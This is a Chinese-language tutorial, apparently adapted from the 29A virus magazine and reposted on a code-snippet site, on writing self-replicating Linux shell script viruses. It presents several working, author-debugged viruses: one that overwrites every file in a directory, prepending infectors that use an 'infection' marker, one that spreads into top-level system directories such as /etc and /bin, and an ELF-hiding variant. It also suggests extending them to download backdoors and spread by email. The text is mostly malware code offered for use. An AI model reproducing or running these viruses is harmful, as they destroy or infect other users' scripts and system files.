感染linux脚本程序技术

前言
----
  本文来源于29A病毒杂志,其上对linux shell病毒技术有了一个综合的阐述,我不想翻译它,我以它的那篇为模板
写了这篇中文的文章,里面的代码我都做了调试.
  对于shell编程的程序员来说所谓的shell病毒技术其实根本就是小牛一毛,这点在大家看完本文后就会有所体会
但,简单归简单,我们还是要去了解它,呵呵.

主要的shell病毒技术
-------------------
  当然,本文需要你至少了解linux shell编程的基础知识和一星点的病毒知识.
  ok!我们进入正题!
  我们来看一个最原始的shell病毒,代码最能说明问题:
---------------------------------------------------------
#shellvirus I
for file in *
do
 cp $0 $file
done
---------------------------------------------------------
简单吧?遍历当前文件系统的所有文件,然后覆盖所有文件.但是,我们知道linux是多用户的操作系统,它的文件是具有
保护模式的,所以以上的脚本有可能会报出一大堆的错误,所以它很快就会被管理员发现并制止它的传染.所以我们可以
为该脚本做个判断,这样隐蔽性就大大增强了:
---------------------------------------------------------
#shellvirus II
for file in *
  do
  if test -f $file
  then
 if test -x $file
 then
  if test -w $file
  then
 if grep -s echo $file >.mmm
 then
 cp $0 $file
  fi; fi; fi; fi; fi
done
rm .mmm -f
---------------------------------------------------------
ok.我们改进了一下,加了若干的判断,判断文件是否存在,是否文件可执行,是否我们有权限写,再判断它是否是脚本程序
如果是就cp $0 $file,所以这段代码是感然该系统所有的脚本程序的,危害性还是比较大的.if grep -s echo $file>/.mmm
这句也可以这样写:if file $file | grep -s 'Bourne shell script' > /dev/nul ; then,也就是判断file是否为shell
脚本程序.
  但是,脚本病毒一旦在感染完毕之后就什么也不做了,它没有象二进制病毒那样的潜伏的危害性,而且以上的脚本只是简
单的覆盖宿主而已,所以我这里利用了一下传统的二进制病毒的感染机制,效果也不错:),看看下面代码:
---------------------------------------------------------
#infection
head -n 24 $0 > .test<-取自身保存到.test
  for file in *<-遍历文件系统
  do
 if test -f $file<-判断是否为文件
 then
 if test -x $file<-判断文件是否可执行
 then
  if test -w $file<-判断文件是否可写
  then
  if grep -s echo $file >.mmm<-判断是否为脚本程序
  then
  head -n 1 $file >.mm<-提取要感染的脚本程序的第一行
  if grep -s infection .mm >.mmm<-判断该文件是否已经被感染
  then
 rm -f .mm<-已经被感染,则跳过
  else<-还未被感染
 cat $file > .SAVEE<-很熟悉吧?借用了传统的二进制文件的感染机制
 cat .test > $file
 cat .SAVEE >> $file
 fi; fi; fi; fi; fi
done
rm .test .SAVEE .mmm .mm -f
--------------------------------------------------------
程序的注解足以说明了,其实增加了潜伏的危害性,但还是特容易被发现,没办法的事情,shell脚本一般都是明文的,呵呵.不过
危害性已经相当大了.这段程序用了一个感染标志:infection来判断是否已经被感染,着在程序中可以反应出来.
ok,为了使上面的代码不容易被发现,我必须优化它,最先考虑的肯定是精练代码:
--------------------------------------------------------
#infection
for file in * ;do
 if test -f $file && test -x $file && test -w $file ; then
  if grep -s echo $file > /dev/nul ; then
 head -n 1 $file >.mm
  if grep -s infection .mm > /dev/nul ; then
 rm .mm -f ; else
  cat $file > .SAVEE
  head -n 13 $0 > $file
  cat .SAVEE >> $file
  fi; fi; fi
done
rm .SAVEE .mm -f
--------------------------------------------------------
现在只有两个临时文件的产生了,代码也被精简到了13行.当然可以完全用;来把代码甚至写到1-2行,但这里我只是说明问题,就
不写出来了.
好,我们看看,shell病毒还能做哪些有用的事情,有可能我们想感染别的目录的文件,比如根目录或者是/etc,/bin等等,因为大多
数有用的系统配置脚本都存放在那些目录下,只要对上述代码稍作改动就可以实现了:)
--------------------------------------------------------
#infection
xtemp=$pwd<-保存当前路径
head -n 22 $0 > /.test
for dir in /* ; do<-遍历/目录
  if test -d $dir ; then<-如果是目录就cd该目录
 cd $dir
 for file in * ; do<-遍历该目录文件
  if test -f $file && test -x $file && test -w $file ; then<-确定文件是否可执行,可写
 if grep -s echo $file > /dev/nul ; then<-确定是否为脚本程序
 head -n 1 $file > .mm
 if grep -s infection .mm > /dev/nul ; then<-确定是否已经被感染
  rm .mm -f ; else
 cat $file > /.SAVEE<-和前面的感染机制一样感染未被感染的脚本程序
 cat /.test > $file
 cat /.SAVEE >> $file
  fi; fi; fi
 done
 cd ..
  fi
done
cd $xtemp<-返回原目录
rm /.test /.SAVEE .mm -f
-------------------------------------------------------------
其实这段代码只感染了/目录下的一层目录.当然我们可以使它感染的更深,只是加几个循环而已.同样shell病毒可以做很多事情
如download后门程序,为机器自动开后门,主动去攻击联网的其他机器,取用户的email来发送传染等等.总之它的实现技术不高深,
但也比较实用,还是值得去说明一下的,呵呵.
同样,我们也可以感染elf文件,但危害性很小,这里不重点讲,给个例程大家理解一下吧:)
-------------------------------------------------------------
for file in * ;do
 if test -f $file && test -x $file && test -w $file ; then
  if file $file | grep -s 'ELF' > /dev/nul ; then
 mv $file .$file
 head -n 9 $0 > $file
  fi; fi
done
.$0
-------------------------------------------------------------

(0)

相关推荐

  • 感染linux脚本程序技术

    前言 ----   本文来源于29A病毒杂志,其上对linux shell病毒技术有了一个综合的阐述,我不想翻译它,我以它的那篇为模板 写了这篇中文的文章,里面的代码我都做了调试.   对于shell编程的程序员来说所谓的shell病毒技术其实根本就是小牛一毛,这点在大家看完本文后就会有所体会 但,简单归简单,我们还是要去了解它,呵呵. 主要的shell病毒技术 -------------------   当然,本文需要你至少了解linux shell编程的基础知识和一星点的病毒知识.  

  • Linux 脚本编写基础知识

    1. Linux 脚本编写基础 1.1 语法基本介绍 1.1.1 开头 程序必须以下面的行开始(必须放在文件的第一行):#!/bin/sh 符号#!用来告诉系统它后面的参数是用来执行该文件的程序.在这个例子中我们使用/bin/sh来执行程序. 当编辑好脚本时,如果要执行该脚本,还必须使其可执行. 要使脚本可执行:编译 chmod +x filename 这样才能用./filename 来运行 1.1.2 注释 在进行shell编程时,以#开头的句子表示注释,直到这一行的结束.我们真诚地建议您在程

  • php判断linux下程序问题实例

    本文实例讲述了php判断linux下程序问题.分享给大家供大家参考.具体如下: 有时候在服务器上面写一些脚本的时候,经常要放到crontab里面定时运行.时间长了就有一个问题,那就是程序重复运行消耗太多的资源,怎么处理呢?下面璞玉写了两种方法. //第一种:用linux里面的正则匹配 function ifrun($clsname,$bf = 0) { //下面进行检测,如有一个进程正在运行,则不运行 $str=shell_exec("/bin/ps ax > /home/root/&qu

  • JavaScript/VBScript脚本程序调试(Wscript篇)

    在实际工作中,我发现程序员对脚本抱怨最多的就是脚本程序很难调试这个缺点,特别是调试.vbs等WSH程序的时候,总是: 1. 在资源管理器里面双击一个.vbs文件. 2. 程序里面发生了一个错误,例如异常,或者编程逻辑错误. 3. 一行行阅读源文件,然后在估计发生错误的地方,添加很多的Msgbox.Show,打印一些变量的值. 4. 重新执行.vbs文件 5. "当当当",一系列的 "确定"点完了以后,人也晕了,重新回到第三步继续-- 其实我们也是可以用Visual

  • 调试JavaScript/VBScript脚本程序(IE篇)

    这两种方式,都可以使用Visual Studio来进行调试,先看大家用得比较频繁的网页脚本程序的调试: 1. 要调试网页里面的脚本程序,调试器需要宿主程序-这里也就是IE的支持,实际上所有的脚本程序解释器都实现了一个COM的调试接口.调试器通过查询解释器的这个接口,可以设置断点,查询变量以及捕捉异常,当然,查询到这个接口,需要宿主程序同意--至于如何实现这个接口,我们会在以后的文章里面讲到. 2. 默认情况下,IE是将脚本调试支持功能关闭的,因此你需要显示地打开它.打开IE,点击"工具"

  • Linux脚本自动输入密码

    #!/usr/bin/expect set timeout 20 set password "12345678" spawn /usr/bin/sudo su expect "*password for xxx: " send "$password\n" interact 保存内容到一个文件中,如exp-demo.sh chmod 0777 exp-demo.sh 然后在shell下执行: expect exp-demo.sh 以上所述是小编给大

  • linux脚本判断条件总结(必看)

    如下所示: -b file 若文件存在且是一个块特殊文件,则为真 -c file 若文件存在且是一个字符特殊文件,则为真 -d file 若文件存在且是一个目录,则为真 -e file 若文件存在,则为真 -f file 若文件存在且是一个规则文件,则为真 -g file 若文件存在且设置了SGID位的值,则为真 -h file 若文件存在且为一个符合链接,则为真 -k file 若文件存在且设置了"sticky"位的值 -p file 若文件存在且为一已命名管道,则为真 -r fil

  • 浅谈Linux 脚本 sh 和 ./ 的区别

    如果.不在PATH里面,要执行当前目录下的可执行文件,使用全路径: ./executable-file PATH是环境变量,如果将当前目录"./"添加到环境变量中,那么也可以不用"./",直接输入当前目录下有可执行权限的可执行文件就可以运行了 如果要执行一个sh脚本,不管那个脚本有没有可执行权限,都可以使用: sh [file] 这时file是作为参数传给sh的,如果file不在当前目录下,也需要使用全路径. 全路径有绝对路径和相对路径两种../和../开头的都是相

  • Linux 集群技术

    目前,越来越多的网站采用Linux操作系统,提供邮件.Web.文件存储.数据库等服务. 也有非常多的公司在企业内部网中利用Linux服务器提供这些服务.随着人们对Linux服务器依赖的加深,对其可靠性.负载能力和计算能力也倍加关注.Linux集群技术应运而生,可以以低廉的成本,很好地满足人们的这些需要. Linux竞争力很强的原因之一,是它可以运行于极为普及的PC机上,不需要购买昂贵的专用硬件设备.在几台运行Linux的PC机上,只要加入相应的集群软件,就可以组成具有超强可靠性.负载能力和计算能

  • Linux脚本自动打包发服务

    适用于前后台分离的服务 一个jar包 一个前台工程 实现自动杀端口,复制文件,备份数据,发布新版本. 脚本复制到Linux中 [./jb.sh]按Enter运行即可 内容如下: #自定义存放的地方 #文件存放的根目录 latestDir=/home/xnj #jar包名字 jarName=swWeb.jar #前端压缩包文件名 qdZipName=Desktop.zip #前端tomcat的位置 qdTomcatPosition=/home/tomcat/apache-tomcat-8.5.43

随机推荐